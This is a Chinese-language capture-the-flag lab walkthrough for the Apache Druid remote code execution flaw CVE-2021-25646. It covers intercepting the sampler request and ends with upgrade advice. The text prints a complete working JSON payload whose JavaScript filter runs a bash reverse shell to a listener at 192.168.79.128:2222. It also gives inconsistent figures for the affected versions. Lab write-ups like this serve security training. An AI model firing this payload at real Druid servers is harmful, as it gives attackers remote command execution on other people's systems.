漏洞介绍
名称: druid 远程命令执行 (CVE-2021-25646)
描述: Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。
影响版本
Apache Druid <= 0.20.1
解题过程
1.打开靶场
2.先后点击下图所示位置
3.在右下角输入指定内容
Base directory:
quickstart/tutorial/
File filter:
wikiticker-2015-09-12-sampled.json.gz
4.输入完成后依次点击如下图所示按钮
5.然后一直点击右下角的Next按钮,同时注意上方的导航栏,每点击一次 Next,导航栏都会往后移动一个,到filter之前的时候,点击Next进行抓包。
注意看下图中红框中的内容,如果不是filter,说明抓错包了
6.替换数据包中POST的Data数据,改成我们的POC,服务器打开监听,发送数据包,执行反弹shell的命令
POC
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.79.128/2222 0>&1')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}
7.反弹shell成功,执行获得flag的命令,获得flag
修复建议
建议及时更新Apache Druid,
下载链接为:https://druid.apache.org/downloads.html
https://github.com/apache/druid/releases/tag/druid-0.20.1